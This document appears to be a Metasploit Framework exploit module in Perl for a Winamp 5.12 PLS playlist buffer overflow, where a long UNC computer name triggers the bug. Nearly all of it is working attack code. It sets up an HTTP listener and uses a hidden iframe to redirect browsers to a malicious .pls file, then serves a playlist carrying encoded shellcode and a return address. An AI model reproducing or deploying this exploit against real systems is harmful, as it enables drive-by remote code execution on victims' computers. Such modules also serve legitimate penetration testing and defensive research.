Nullsoft Winamp Player PLS File Handling Remote Buffer Overflow Exploit (Universal)
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##
package Msf::Exploit::winamp_playlist_unc;
use strict;
use base "Msf::Exploit";
use Pex::Text;
use IO::Socket::INET;
use IPC::Open3;
my $advanced =
{
'Gzip' => [1, 'Enable gzip content encoding'],
'Chunked' => [1, 'Enable chunked transfer encoding'],
};
my $info =
{
'Name' => 'Winamp Playlist UNC Path Computer Name Overflow',
'Version' => '$Revision: 1.1 $',
'Authors' =>
[
'H D Moore <hdm [at] metasploit.com',
],
'Description' =>
Pex::Text::Freeform(qq{
This module exploits a vulnerability in the Winamp media player.
This flaw is triggered when a audio file path is specified, inside a
playlist, that consists of a UNC path with a long computer name. This
module delivers the playlist via the browser.
}),
'Arch' => [ 'x86' ],
'OS' => [ 'win32', 'winxp', 'win2003' ],
'Priv' => 0,
'AutoOpts' => { 'EXITFUNC' => 'process' },
'UserOpts' =>
{
'HTTPPORT' => [ 1, 'PORT', 'The local HTTP listener port', 8080 ],
'HTTPHOST' => [ 0, 'HOST', 'The local HTTP listener host', "0.0.0.0" ],
'REALHOST' => [ 0, 'HOST', 'External address to use for redirects (NAT)' ],
},
'Payload' =>
{
'Space' => 512,
'BadChars' => "\x00\x5c\x2f\x0a\x0d\x20",
'Keys' => ['-bind'],
# Landing on \x5c\x5c trashes esp, restore from ecx
'PrependEncoder' => "\x87\xe1",
# Disable nop sleds completely (dont modify ecx)
'MinNops' => 0,
'MaxNops' => 0,
},
'Refs' =>
[
['BID', '16410'],
],
'DefaultTarget' => 0,
'Targets' =>
[
# Return to exe, 0x0d is replaced by 0x00 >:-)
[ 'Winamp 5.12 Universal', 0x0d45fece ]
],
'Keys' => [ 'winamp' ],
'DisclosureDate' => 'Jan 29 2006',
};
sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
return($self);
}
sub Exploit
{
my $self = shift;
my $server = IO::Socket::INET->new(
LocalHost => $self->GetVar('HTTPHOST'),
LocalPort => $self->GetVar('HTTPPORT'),
ReuseAddr => 1,
Listen => 1,
Proto => 'tcp'
);
my $client;
# Did the listener create fail?
if (not defined($server)) {
$self->PrintLine("[-] Failed to create local HTTP listener on " . $self->GetVar('HTTPPORT'));
return;
}
my $httphost = $self->GetVar('HTTPHOST');
$httphost = Pex::Utils::SourceIP('1.2.3.4') if $httphost eq '0.0.0.0';
$self->PrintLine("[*] Waiting for connections to http://". $httphost .":". $self->GetVar('HTTPPORT') ."/");
while (defined($client = $server->accept())) {
$self->HandleHttpClient(Msf::Socket::Tcp->new_from_socket($client));
}
return;
}
sub HandleHttpClient
{
my $self = shift;
my $fd = shift;
# Set the remote host information
my ($rport, $rhost) = ($fd->PeerPort, $fd->PeerAddr);
# Read the HTTP command
my ($cmd, $url, $proto) = split / /, $fd->RecvLine(10);
# Read the HTTP headers
my $headers;
while ( (my $line = $fd->RecvLine(10))) {
$headers .= $line;
last if $line eq "\r\n";
}
if ($url !~ /\.pls/i) {
$self->PrintLine("[*] HTTP Client connected from $rhost:$rport, redirecting...");
my $content =
"<html><body>".
"<iframe style='position:absolute;visibility:hidden;' " .
"src='". RandomPath() . ".pls'></iframe>" .
"One second please...</body></html>";
$fd->Send($self->BuildResponse($content));
$fd->Close;
return;
}
my $target_idx = $self->GetVar('TARGET');
my $target = $self->Targets->[$target_idx];
my $shellcode = $self->GetVar('EncodedPayload')->Payload;
my $name = "The Metasploit(TM) Theme Song";
my $file = Pex::Text::EnglishText(1026);
substr($file, 1022, 4, pack('V', $target->[1]));
substr($file, 0, length($shellcode), $shellcode);
my $play =
"[playlist]\r\n" .
"File1=\\\\$file\r\n" .
"Title1=$name\r\n" .
"Length1=FFF\r\n" .
"NumberOfEntries=1\r\n" .
"Version=2\r\n";
$self->PrintLine("[*] HTTP Client connected from $rhost:$rport, sending ".length($shellcode)."
bytes of payload...");
$fd->Send($self->BuildResponse($play, "audio/x-scpls"));
# Prevents IE from throwing an error in some cases
select(undef, undef, undef, 0.1);
$fd->Close();
}
sub RandomPath {
my $self = shift;
my $path;
while (length($path) < 100) {
$path .= "/" . Pex::Text::AlphaNumText(int(rand(30) + 5));
}
return $path;
}
sub BuildResponse {
my ($self, $content, $ctype) = @_;
$ctype ||= "text/html";
my $response =
"HTTP/1.1 200 OK\r\n" .
"Content-Type: $ctype\r\n";
if ($self->GetVar('Gzip')) {
$response .= "Content-Encoding: gzip\r\n";
$content = $self->Gzip($content);
}
if ($self->GetVar('Chunked')) {
$response .= "Transfer-Encoding: chunked\r\n";
$content = $self->Chunk($content);
} else {
$response .= 'Content-Length: ' . length($content) . "\r\n" .
"Connection: close\r\n";
}
$response .= "\r\n" . $content;
return $response;
}
sub Chunk {
my ($self, $content) = @_;
my $chunked;
while (length($content)) {
my $chunk = substr($content, 0, int(rand(10) + 1), '');
$chunked .= sprintf('%x', length($chunk)) . "\r\n$chunk\r\n";
}
$chunked .= "0\r\n\r\n";
return $chunked;
}
sub Gzip {
my $self = shift;
my $data = shift;
my $comp = int(rand(5))+5;
my($wtr, $rdr, $err);
my $pid = open3($wtr, $rdr, $err, 'gzip', '-'.$comp, '-c', '--force');
print $wtr $data;
close ($wtr);
local $/;
return (<$rdr>);
}
1;
推荐
评论(0条)
